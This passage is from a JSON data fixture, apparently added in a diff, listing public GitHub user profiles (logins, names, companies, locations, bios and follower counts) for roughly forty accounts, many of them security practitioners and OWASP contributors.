"MDQ6VXNlcjcyMjY2MjQ4", + "bio": "Cybersecurity || Python || C++ || Bash || student by day, programmer by night", + "is_hireable": false, + "twitter_username": "sumukhchitloor" + } +}, +{ + "model": "github.user", + "pk": 364, + "fields": { + "nest_created_at": "2024-09-11T21:13:43.599Z", + "nest_updated_at": "2024-09-22T17:46:27.044Z", + "name": "", + "login": "kaboom2517", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/166014299?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-04-04T10:57:23Z", + "updated_at": "2024-04-04T10:57:23Z", + "node_id": "U_kgDOCeUtWw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 365, + "fields": { + "nest_created_at": "2024-09-11T21:13:57.201Z", + "nest_updated_at": "2024-09-22T20:29:22.115Z", + "name": "Divya Goswami", + "login": "rachejazz", + "email": "mail@rachejazz.me", + "avatar_url": "https://avatars.githubusercontent.com/u/42383989?v=4", + "company": "Student @UoB", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 110, + "public_gists_count": 14, + "public_repositories_count": 41, + "created_at": "2018-08-14T15:28:35Z", + "updated_at": "2024-09-18T08:24:06Z", + "node_id": "MDQ6VXNlcjQyMzgzOTg5", + "bio": "Falcon Intern @Crowdstrike | MSc @ University Of Birmingham |\r\nTSC @openmainframeproject", + "is_hireable": false, + "twitter_username": "rachejazz" + } +}, +{ + "model": "github.user", + "pk": 366, + "fields": { + "nest_created_at": "2024-09-11T21:14:05.557Z", + "nest_updated_at": "2024-09-22T20:25:05.183Z", + "name": "Felipe Zipitría", + "login": "fzipi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3012076?v=4", + "company": "Facultad de Ingeniería, Universidad de la República", + "location": "Montevideo, Uruguay", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 50, + "public_gists_count": 16, + "public_repositories_count": 128, + "created_at": "2012-12-11T00:25:05Z", + "updated_at": "2024-09-22T11:29:23Z", + "node_id": "MDQ6VXNlcjMwMTIwNzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 367, + "fields": { + "nest_created_at": "2024-09-11T21:14:11.414Z", + "nest_updated_at": "2024-09-11T21:14:11.414Z", + "name": "", + "login": "Tejpandya", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23713711?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2016-11-24T05:21:11Z", + "updated_at": "2023-09-26T15:55:49Z", + "node_id": "MDQ6VXNlcjIzNzEzNzEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 368, + "fields": { + "nest_created_at": "2024-09-11T21:14:12.225Z", + "nest_updated_at": "2024-09-11T21:14:12.225Z", + "name": "", + "login": "anust", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48667410?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-03-18T05:25:20Z", + "updated_at": "2022-08-14T14:05:50Z", + "node_id": "MDQ6VXNlcjQ4NjY3NDEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 369, + "fields": { + "nest_created_at": "2024-09-11T21:14:13.038Z", + "nest_updated_at": "2024-09-11T21:14:13.038Z", + "name": "Jash Patel", + "login": "jash2810", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37921859?v=4", + "company": "Deloitte - IT Security Analyst", + "location": "Oshawa, Ontario, Canada", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2018-03-30T04:35:33Z", + "updated_at": "2024-08-06T22:48:08Z", + "node_id": "MDQ6VXNlcjM3OTIxODU5", + "bio": "B.E. in Information Technology\r\nMasters in IT Security\r\nGujarat Industrial Hackathon 2018-19 Winner\r\n", + "is_hireable": false, + "twitter_username": "whojash" + } +}, +{ + "model": "github.user", + "pk": 370, + "fields": { + "nest_created_at": "2024-09-11T21:14:13.856Z", + "nest_updated_at": "2024-09-22T19:48:22.704Z", + "name": "Dexter", + "login": "dextermallo", + "email": "dextermallo@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29012607?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2017-05-28T09:13:58Z", + "updated_at": "2024-09-21T12:54:42Z", + "node_id": "MDQ6VXNlcjI5MDEyNjA3", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 371, + "fields": { + "nest_created_at": "2024-09-11T21:14:15.969Z", + "nest_updated_at": "2024-09-11T21:14:15.969Z", + "name": "KHALIL", + "login": "ilyasse005", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52047430?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2019-06-20T17:18:59Z", + "updated_at": "2024-07-25T17:37:08Z", + "node_id": "MDQ6VXNlcjUyMDQ3NDMw", + "bio": "Hi there! My name is KHALIL, and as an IT support and network technician, I am thrilled to offer my services on Fiverr. With my knowledge of network technology ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 372, + "fields": { + "nest_created_at": "2024-09-11T21:14:20.760Z", + "nest_updated_at": "2024-09-22T18:24:09.980Z", + "name": "Swaroop Yermalkar", + "login": "swaroopsy", + "email": "swaroop.infosec@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9929997?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 49, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2014-11-24T11:53:53Z", + "updated_at": "2024-07-11T09:36:23Z", + "node_id": "MDQ6VXNlcjk5Mjk5OTc=", + "bio": "Author | Security Engineer | Bug Bounty Hunter | OWASP iGoat Project Lead", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 373, + "fields": { + "nest_created_at": "2024-09-11T21:14:24.680Z", + "nest_updated_at": "2024-09-11T21:27:08.774Z", + "name": "Indra Z", + "login": "sigeri94", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30687786?v=4", + "company": "Securxcess", + "location": "Jakarta", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-08-03T08:40:51Z", + "updated_at": "2024-07-22T04:19:44Z", + "node_id": "MDQ6VXNlcjMwNjg3Nzg2", + "bio": "just another geek", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 374, + "fields": { + "nest_created_at": "2024-09-11T21:14:25.514Z", + "nest_updated_at": "2024-09-11T21:14:25.514Z", + "name": "Kevin Mitchell Jr ", + "login": "klmitchell2", + "email": "Mitchell.kevinjr@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5108164?v=4", + "company": "", + "location": "Wisconsin", + "collaborators_count": 0, + "following_count": 164, + "followers_count": 47, + "public_gists_count": 5, + "public_repositories_count": 23, + "created_at": "2013-07-28T19:07:01Z", + "updated_at": "2024-08-26T21:59:06Z", + "node_id": "MDQ6VXNlcjUxMDgxNjQ=", + "bio": "Objective-C | Swift | Mobile Sec", + "is_hireable": false, + "twitter_username": "klmitchell212" + } +}, +{ + "model": "github.user", + "pk": 375, + "fields": { + "nest_created_at": "2024-09-11T21:14:26.352Z", + "nest_updated_at": "2024-09-11T21:14:26.352Z", + "name": "", + "login": "windyzxcui", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19344341?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-05-13T10:15:41Z", + "updated_at": "2023-02-07T09:06:29Z", + "node_id": "MDQ6VXNlcjE5MzQ0MzQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 376, + "fields": { + "nest_created_at": "2024-09-11T21:14:27.380Z", + "nest_updated_at": "2024-09-11T21:14:27.380Z", + "name": "Ram Gade", + "login": "Rameshwarg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10072986?v=4", + "company": "Nihilent Limited", + "location": "Pune, Maharashtra", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-12-04T10:02:00Z", + "updated_at": "2020-05-29T05:31:03Z", + "node_id": "MDQ6VXNlcjEwMDcyOTg2", + "bio": "An iOS Developer having 6+ years of Exp. in iOS app development", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 377, + "fields": { + "nest_created_at": "2024-09-11T21:14:28.236Z", + "nest_updated_at": "2024-09-11T21:14:28.236Z", + "name": "vedant", + "login": "vedant3005", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20610890?v=4", + "company": "", + "location": "new delhi", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-07-23T09:48:29Z", + "updated_at": "2023-04-05T06:35:23Z", + "node_id": "MDQ6VXNlcjIwNjEwODkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 378, + "fields": { + "nest_created_at": "2024-09-11T21:14:29.053Z", + "nest_updated_at": "2024-09-11T21:14:29.053Z", + "name": "Paul ", + "login": "phyushin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2320232?v=4", + "company": "n/a", + "location": "United Kingdom", + "collaborators_count": 0, + "following_count": 73, + "followers_count": 27, + "public_gists_count": 4, + "public_repositories_count": 73, + "created_at": "2012-09-10T20:32:09Z", + "updated_at": "2024-08-17T21:39:29Z", + "node_id": "MDQ6VXNlcjIzMjAyMzI=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 379, + "fields": { + "nest_created_at": "2024-09-11T21:14:29.893Z", + "nest_updated_at": "2024-09-11T21:14:29.893Z", + "name": "Ernest Ang", + "login": "ernestang98", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56427824?v=4", + "company": "https://ernestang.netlify.app/", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2019-10-11T06:46:49Z", + "updated_at": "2024-06-07T04:59:11Z", + "node_id": "MDQ6VXNlcjU2NDI3ODI0", + "bio": "Junior Year Undergraduate, Business and Computer Science, Nanyang Technological University", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 380, + "fields": { + "nest_created_at": "2024-09-11T21:14:30.725Z", + "nest_updated_at": "2024-09-22T17:46:59.004Z", + "name": "ITMustang", + "login": "ITmustang", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7395551?v=4", + "company": "", + "location": "everywhere", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-04-24T13:29:38Z", + "updated_at": "2024-07-03T17:25:12Z", + "node_id": "MDQ6VXNlcjczOTU1NTE=", + "bio": "digital violator of all that is 'secure'", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 381, + "fields": { + "nest_created_at": "2024-09-11T21:14:40.338Z", + "nest_updated_at": "2024-09-11T21:14:40.338Z", + "name": "Vlad Garbuz", + "login": "rrroar", + "email": "vgarbuz@softseq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19538456?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-05-23T19:02:13Z", + "updated_at": "2024-07-19T20:10:20Z", + "node_id": "MDQ6VXNlcjE5NTM4NDU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 382, + "fields": { + "nest_created_at": "2024-09-11T21:14:41.654Z", + "nest_updated_at": "2024-09-22T19:25:40.817Z", + "name": "Jay Patel", + "login": "jay13patel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24792342?v=4", + "company": "DIT University", + "location": "Dehradun", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2016-12-27T12:10:38Z", + "updated_at": "2024-09-21T11:35:47Z", + "node_id": "MDQ6VXNlcjI0NzkyMzQy", + "bio": "DevOps & Security Aficionado\r\n\r\n", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 383, + "fields": { + "nest_created_at": "2024-09-11T21:14:42.911Z", + "nest_updated_at": "2024-09-22T20:28:23.221Z", + "name": "", + "login": "adeyosemanputra", + "email": "ade.putra@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/24958168?v=4", + "company": "", + "location": "Indonesia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 160, + "public_gists_count": 2, + "public_repositories_count": 228, + "created_at": "2017-01-06T12:06:31Z", + "updated_at": "2024-08-29T15:39:42Z", + "node_id": "MDQ6VXNlcjI0OTU4MTY4", + "bio": "Open Source Enthusiast,\r\nProject Leader @OWASP \r\nChapter Leader @OWASP \r\n", + "is_hireable": false, + "twitter_username": "johnleedik" + } +}, +{ + "model": "github.user", + "pk": 384, + "fields": { + "nest_created_at": "2024-09-11T21:14:44.162Z", + "nest_updated_at": "2024-09-12T01:10:47.468Z", + "name": "Vulnz", + "login": "vulnz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20043135?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 107, + "followers_count": 39, + "public_gists_count": 2, + "public_repositories_count": 33, + "created_at": "2016-06-20T11:20:40Z", + "updated_at": "2024-08-27T23:39:57Z", + "node_id": "MDQ6VXNlcjIwMDQzMTM1", + "bio": "Abandon hope, all ye who enter here", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 385, + "fields": { + "nest_created_at": "2024-09-11T21:14:45.392Z", + "nest_updated_at": "2024-09-11T21:14:46.239Z", + "name": "Michael", + "login": "Michael-T4A", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58176155?v=4", + "company": "Time4Advice", + "location": "Norwich", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-11-25T13:20:02Z", + "updated_at": "2023-09-19T14:45:34Z", + "node_id": "MDQ6VXNlcjU4MTc2MTU1", + "bio": "Software Test Manager", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 386, + "fields": { + "nest_created_at": "2024-09-11T21:14:47.061Z", + "nest_updated_at": "2024-09-11T21:14:47.061Z", + "name": "Ahmet KIZILKAYA", + "login": "ahmetkizilkaya", + "email": "ahmetkizilkaya43@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16667111?v=4", + "company": "", + "location": "İstanbul/Turkey", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2016-01-12T13:25:30Z", + "updated_at": "2024-09-08T19:45:07Z", + "node_id": "MDQ6VXNlcjE2NjY3MTEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 387, + "fields": { + "nest_created_at": "2024-09-11T21:14:47.924Z", + "nest_updated_at": "2024-09-11T21:14:47.924Z", + "name": "", + "login": "broyere", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34651222?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-12-18T12:54:53Z", + "updated_at": "2020-12-06T21:11:10Z", + "node_id": "MDQ6VXNlcjM0NjUxMjIy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 388, + "fields": { + "nest_created_at": "2024-09-11T21:14:48.758Z", + "nest_updated_at": "2024-09-11T21:14:49.624Z", + "name": "Marco Schlicht", + "login": "Bergiu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13796963?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 37, + "followers_count": 22, + "public_gists_count": 5, + "public_repositories_count": 42, + "created_at": "2015-08-14T11:57:52Z", + "updated_at": "2024-09-09T20:26:24Z", + "node_id": "MDQ6VXNlcjEzNzk2OTYz", + "bio": "Computer Science at RWTH Aachen University", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 389, + "fields": { + "nest_created_at": "2024-09-11T21:14:50.440Z", + "nest_updated_at": "2024-09-12T01:26:39.811Z", + "name": "", + "login": "nibiwodong", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17465789?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 56, + "created_at": "2016-02-25T03:19:58Z", + "updated_at": "2024-05-14T01:42:06Z", + "node_id": "MDQ6VXNlcjE3NDY1Nzg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 390, + "fields": { + "nest_created_at": "2024-09-11T21:14:51.241Z", + "nest_updated_at": "2024-09-11T21:14:51.241Z", + "name": "Suraj Gautam", + "login": "surajgautam", + "email": "teamwarrior200@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16001925?v=4", + "company": "", + "location": "United States", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 19, + "public_gists_count": 2, + "public_repositories_count": 25, + "created_at": "2015-11-24T15:37:31Z", + "updated_at": "2024-09-07T21:34:35Z", + "node_id": "MDQ6VXNlcjE2MDAxOTI1", + "bio": "Wass up?", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 391, + "fields": { + "nest_created_at": "2024-09-11T21:14:52.047Z", + "nest_updated_at": "2024-09-11T21:14:52.047Z", + "name": "Antonios Kritsas", + "login": "AnthonyK95", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36008193?v=4", + "company": "Vicorio", + "location": "Greece", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-01-31T17:25:11Z", + "updated_at": "2024-07-20T21:23:20Z", + "node_id": "MDQ6VXNlcjM2MDA4MTkz", + "bio": "Nickname: MR Goofy.\r\nInfoSec Engineer writing luxury code. \r\nCurious about fintech, watches,and small leather goods", + "is_hireable": false, + "twitter_username": "MrGoofykri" + } +}, +{ + "model": "github.user", + "pk": 392, + "fields": { + "nest_created_at": "2024-09-11T21:14:52.906Z", + "nest_updated_at": "2024-09-11T21:14:52.906Z", + "name": "huntr.dev | protect open source software", + "login": "huntr-helper", + "email": "security@huntr.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/61279246?v=4", + "company": "@418sec", + "location": "London, United Kingdom", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 84, + "public_gists_count": 0, + "public_repositories_count": 44, + "created_at": "2020-02-20T13:03:00Z", + "updated_at": "2023-08-01T10:03:48Z", + "node_id": "MDQ6VXNlcjYxMjc5MjQ2", + "bio": "Get paid to find & fix security vulnerabilities in open source software and be recognised for protecting the world.", + "is_hireable": false, + "twitter_username": "huntrdev" + } +}, +{ + "model": "github.user", + "pk": 393, + "fields": { + "nest_created_at": "2024-09-11T21:14:53.720Z", + "nest_updated_at": "2024-09-22T17:47:07.844Z", + "name": "", + "login": "Amirtemam", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/140509001?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-25T11:16:00Z", + "updated_at": "2023-11-18T03:53:16Z", + "node_id": "U_kgDOCF__SQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 394, + "fields": { + "nest_created_at": "2024-09-11T21:14:58.605Z", + "nest_updated_at": "2024-09-11T21:14:58.605Z", + "name": "Xu ZhenYa", + "login": "ZhenYaXu", + "email": "xuzhenya1997@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29617271?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-06-22T01:28:53Z", + "updated_at": "2024-08-28T06:13:17Z", + "node_id": "MDQ6VXNlcjI5NjE3Mjcx", + "bio": "I'm a college student majoring in computer science who is passionate about developing cutting-edge software and contributing to the open source community.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 395, + "fields": { + "nest_created_at": "2024-09-11T21:14:59.446Z", + "nest_updated_at": "2024-09-22T20:26:07.694Z", + "name": "Shubhangi Choudhary", + "login": "shubhangi013", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78342516?v=4", + "company": "IIT (BHU), Varanasi", + "location": "", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 73, + "public_gists_count": 0, + "public_repositories_count": 103, + "created_at": "2021-02-01T07:19:59Z", + "updated_at": "2024-04-27T17:39:35Z", + "node_id": "MDQ6VXNlcjc4MzQyNTE2", + "bio": "GSoC'23@SLIPS | Upcoming TPM @Microsoft ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 396, + "fields": { + "nest_created_at": "2024-09-11T21:15:01.073Z", + "nest_updated_at": "2024-09-22T19:25:39.221Z", + "name": "Mohamed Mostafa ", + "login": "mohamedmostafadawood", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82728787?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 81, + "followers_count": 24, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2021-04-17T19:16:29Z", + "updated_at": "2024-07-16T23:37:11Z", + "node_id": "MDQ6VXNlcjgyNzI4Nzg3", + "bio": "Learning how to write software, break software, and write software that breaks software.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 397, + "fields": { + "nest_created_at": "2024-09-11T21:15:01.904Z", + "nest_updated_at": "2024-09-11T21:15:01.904Z", + "name": "", + "login": "JRockiller1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73624798?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-10-29T02:18:17Z", + "updated_at": "2023-11-25T09:50:46Z", + "node_id": "MDQ6VXNlcjczNjI0Nzk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 398, + "fields": { + "nest_created_at": "2024-09-11T21:15:02.754Z", + "nest_updated_at": "2024-09-22T19:25:39.897Z", + "name": "Parteek Goyal", + "login": "parteekcoder", + "email": "parteekgoyal118@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/100110395?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 34, + "public_gists_count": 0, + "public_repositories_count": 76, + "created_at": "2022-02-21T04:40:09Z", + "updated_at": "2024-09-13T13:33:52Z", + "node_id": "U_kgDOBfeQOw", + "bio": "Ex- @Microsoft, @Hirebound, @spotsaas | GSoC'23 @NISYSLAB |Web Team Lead @GDSC-NITJ | Member @wdmc-nitj | MERN Stack developer | Open Source Contributor", + "is_hireable": false, + "twitter_username": "parteek_118" + } +}, +{ + "model": "github.user", + "pk": 399, + "fields": { + "nest_created_at": "2024-09-11T21:15:03.591Z", + "nest_updated_at": "2024-09-22T19:25:38.580Z", + "name": "", + "login": "Sarthak-Biswas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74853624?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 44, + "created_at": "2020-11-22T08:13:27Z", + "updated_at": "2024-05-11T08:44:11Z", + "node_id": "MDQ6VXNlcjc0ODUzNjI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 400, + "fields": { + "nest_created_at": "2024-09-11T21:15:06.903Z", + "nest_updated_at": "2024-09-22T20:28:25.759Z", + "name": "Rejah Rehim ", + "login": "rejahrehim", + "email": "rejah@beaglesecurity.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4394746?v=4", + "company": "@beaglesecurity @appfabs ", + "location": "India", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 283, + "public_gists_count": 9, + "public_repositories_count": 108, + "created_at": "2013-05-10T08:36:48Z", + "updated_at": "2024-09-05T18:34:00Z", + "node_id": "MDQ6VXNlcjQzOTQ3NDY=", + "bio": "OWASP Kerala Chapter Lead, Developer of PenQ (Security Testing Browser Bundle), Core maintainer @OWASP Web Security Testing Guide.", + "is_hireable": false, + "twitter_username": "Rejah_Rehim" + } +}, +{ + "model": "github.user", + "pk": 401, + "fields": { + "nest_created_at": "2024-09-11T21:15:19.486Z", + "nest_updated_at": "2024-09-11T21:15:19.486Z", + "name": "", + "login": "p0rkchop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31038441?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-08-15T13:16:27Z", + "updated_at": "2024-08-01T13:40:03Z", + "node_id": "MDQ6VXNlcjMxMDM4NDQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 402, + "fields": { + "nest_created_at": "2024-09-11T21:15:27.719Z", + "nest_updated_at": "2024-09-22T17:47:43.152Z", + "name": "╭∩╮ (òÓ,) ╭∩╮", + "login": "cnsgithub", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13161711?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 46, + "created_at": "2015-07-03T06:31:21Z", + "updated_at": "2023-08-16T09:59:00Z", + "node_id": "MDQ6VXNlcjEzMTYxNzEx", + "bio": "█▬█ █▄█ █▬█ █▄█", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 403, + "fields": { + "nest_created_at": "2024-09-11T21:15:57.809Z", + "nest_updated_at": "2024-09-22T20:29:38.737Z", + "name": "Dave Wichers", + "login": "davewichers", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5004037?v=4", + "company": "EY & OWASP", + "location": "Maryland, U.S.A.", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 130, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-07-13T19:14:21Z", + "updated_at": "2024-09-09T14:05:06Z", + "node_id": "MDQ6VXNlcjUwMDQwMzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 404, + "fields": { + "nest_created_at": "2024-09-11T21:15:58.630Z", + "nest_updated_at": "2024-09-11T21:15:58.630Z", + "name": "", + "login": "paul-gould", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37215657?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-03-09T13:17:31Z", + "updated_at": "2024-07-24T12:59:27Z", + "node_id": "MDQ6VXNlcjM3MjE1NjU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 405, + "fields": { + "nest_created_at": "2024-09-11T21:16:06.849Z", + "nest_updated_at": "2024-09-22T20:29:02.719Z", + "name": "Paul Ionescu", + "login": "paul-ion", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31246137?v=4", + "company": "VMware", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 21, + "public_gists_count": 4, + "public_repositories_count": 9, + "created_at": "2017-08-22T13:10:00Z", + "updated_at": "2024-07-12T17:57:24Z", + "node_id": "MDQ6VXNlcjMxMjQ2MTM3", + "bio": "Security advocate, ethical hacker, security researcher, inventor, martial art enthusiast and father of three.", + "is_hireable": false, + "twitter_username": "CloudSecPaul" + } +}, +{ + "model": "github.user", + "pk": 406, + "fields": { + "nest_created_at": "2024-09-11T21:16:09.338Z", + "nest_updated_at": "2024-09-11T21:16:09.338Z", + "name": "Vince Ren", + "login": "vincente-ren", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/69838140?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-08-18T06:19:39Z", + "updated_at": "2023-11-20T09:41:58Z", + "node_id": "MDQ6VXNlcjY5ODM4MTQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 407, + "fields": { + "nest_created_at": 